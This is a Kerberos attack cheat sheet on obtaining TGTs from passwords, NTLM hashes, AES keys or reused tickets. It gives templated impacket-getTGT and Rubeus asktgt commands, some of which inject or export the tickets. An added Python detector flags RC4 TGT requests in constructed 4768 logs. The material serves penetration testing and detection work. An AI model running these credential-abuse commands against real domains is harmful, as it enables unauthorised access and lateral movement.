# Password / Hash --> TGT

## TGT retrieval methods
- Normal Kerberos authentication
  - Requires the username and plaintext password.
- Pass-the-key
  - Use any Kerberos long-term key of the account (RC4 or AES) to request a TGT without knowing the plaintext password.
  - Overpass-the-Hash
    - If RC4 is enabled for the account, its NTLM hash is the RC4 long-term key and can be used directly to obtain a TGT.
- Pass-the-ticket
  - Reuse a TGT that has already been obtained, regardless of how it was obtained.
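From the defender's side, every one of the methods above that starts from a key rather than a ticket produces a TGT request (Windows Security event 4768) on the domain controller, and the Overpass-the-Hash case in particular shows up as a successful 4768 with ticket encryption type 0x17 (RC4-HMAC) for an account that normally authenticates with AES. The following is an added example, not part of the original cheat sheet: a small Python detector that parses constructed 4768 log lines (the key=value layout, the account names and the IP addresses are all made up for illustration) and reports RC4 TGT requests for accounts that are expected to use AES. The `aes_expected` callback and the field names `TargetUserName`, `IpAddress`, `TicketEncryptionType` and `Status` are assumptions about how your log pipeline exposes the event.

```python
"""Flag Kerberos TGT requests (event 4768) issued with RC4 for AES-capable accounts.

Added example for illustration; the log lines below are constructed, not real data.
Encryption type values follow the Kerberos etype registry (0x11/0x12 = AES,
0x17/0x18 = RC4-HMAC); a failed 4768 carries TicketEncryptionType 0xffffffff.
"""
from dataclasses import dataclass
from typing import Callable, Iterable, List, Optional

ETYPE_NAMES = {
    0x11: "AES128-CTS-HMAC-SHA1-96",
    0x12: "AES256-CTS-HMAC-SHA1-96",
    0x17: "RC4-HMAC",
    0x18: "RC4-HMAC-EXP",
}
RC4_ETYPES = {0x17, 0x18}


@dataclass
class TgtRequest:
    target_user: str
    client_ip: str
    etype: int
    status: int  # 0x0 = KDC issued the TGT


# Constructed sample events (assumed key=value export of Security log 4768/4769).
SAMPLE_EVENTS = [
    "EventID=4768 TargetUserName=alice TargetDomainName=CORP.LOCAL "
    "IpAddress=::ffff:10.0.0.25 TicketEncryptionType=0x12 Status=0x0",
    "EventID=4768 TargetUserName=svc_backup TargetDomainName=CORP.LOCAL "
    "IpAddress=::ffff:10.0.0.77 TicketEncryptionType=0x17 Status=0x0",
    "EventID=4768 TargetUserName=WS01$ TargetDomainName=CORP.LOCAL "
    "IpAddress=::ffff:10.0.0.31 TicketEncryptionType=0x12 Status=0x0",
    "EventID=4768 TargetUserName=bob TargetDomainName=CORP.LOCAL "
    "IpAddress=::ffff:10.0.0.77 TicketEncryptionType=0xffffffff Status=0x18",
    "EventID=4769 TargetUserName=alice TargetDomainName=CORP.LOCAL "
    "IpAddress=::ffff:10.0.0.25 TicketEncryptionType=0x12 Status=0x0",
]


def parse_4768(line: str) -> Optional[TgtRequest]:
    """Parse one key=value event line; return None for anything that is not a 4768."""
    fields = dict(kv.split("=", 1) for kv in line.split())
    if fields.get("EventID") != "4768":
        return None
    ip = fields["IpAddress"]
    if ip.startswith("::ffff:"):  # strip the IPv4-mapped IPv6 prefix Windows logs
        ip = ip[len("::ffff:"):]
    return TgtRequest(
        target_user=fields["TargetUserName"],
        client_ip=ip,
        etype=int(fields["TicketEncryptionType"], 16),
        status=int(fields["Status"], 16),
    )


def find_rc4_tgt_requests(
    lines: Iterable[str],
    aes_expected: Callable[[str], bool] = lambda user: True,
) -> List[TgtRequest]:
    """Return successful TGT requests that used RC4 for accounts expected to use AES.

    `aes_expected` lets you exclude accounts that legitimately lack AES keys
    (legacy accounts, or ones whose password predates AES support); by default
    every account is treated as AES-capable.
    """
    findings = []
    for line in lines:
        req = parse_4768(line)
        if req is None or req.status != 0:
            continue  # not a TGT request, or the KDC refused it
        if req.etype in RC4_ETYPES and aes_expected(req.target_user):
            findings.append(req)
    return findings


def describe(req: TgtRequest) -> str:
    """Human-readable one-liner for an alert."""
    return (f"RC4 TGT issued for {req.target_user} to {req.client_ip} "
            f"(etype {ETYPE_NAMES.get(req.etype, hex(req.etype))})")


if __name__ == "__main__":
    for hit in find_rc4_tgt_requests(SAMPLE_EVENTS):
        print(describe(hit))
```

Running the block prints one alert, for `svc_backup`: the AES requests are normal, the 4769 line is a service-ticket event and is ignored, and the failed request with status 0x18 is skipped because no ticket was issued. The rule is only useful where AES is actually expected, so pair it with an inventory of which accounts have AES keys (the `msDS-SupportedEncryptionTypes` attribute on the account) and treat RC4 TGTs for the remaining accounts as the signal worth investigating.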
## Linux / impacket-getTGT

| Action | Command |
|---|---|
| Password to TGT | `impacket-getTGT <domain>/<user>:'<password>' -dc-ip <dc_ip>` |
| NTLM hash to TGT | `impacket-getTGT -hashes <LMHASH:NTHASH> <domain>/<user> -dc-ip <dc_ip>` |
| AES key to TGT | `impacket-getTGT -aesKey <AES_HEX> <domain>/<user> -dc-ip <dc_ip>` |
## Windows / Rubeus

| Action | Command |
|---|---|
| Password to TGT (inject) | `Rubeus.exe asktgt /user:<user> /domain:<domain> /password:<password> /ptt` |
| NTLM hash to TGT (RC4_HMAC) (inject) | `Rubeus.exe asktgt /user:<user> /domain:<domain> /rc4:<NTHASH> /ptt` |
| AES-256 key to TGT (inject) | `Rubeus.exe asktgt /user:<user> /domain:<domain> /aes256:<HEX> /ptt` |
| AES-128 key to TGT (inject) | `Rubeus.exe asktgt /user:<user> /domain:<domain> /aes128:<HEX> /ptt` |
| Machine account (password) | `Rubeus.exe asktgt /user:<machine$> /domain:<domain> /password:<password> /ptt` |
| Specify DC/KDC | `Rubeus.exe asktgt /user:<user> /domain:<domain> /password:<password> /dc:<dc_ip_or_fqdn> /ptt` |
| Save TGT to file | `Rubeus.exe asktgt /user:<user> /domain:<domain> /password:<password> /outfile:C:\temp\<user>.tgt.kirbi` |
| Base64 ticket to stdout | `Rubeus.exe asktgt /user:<user> /domain:<domain> /password:<password> /nowrap` |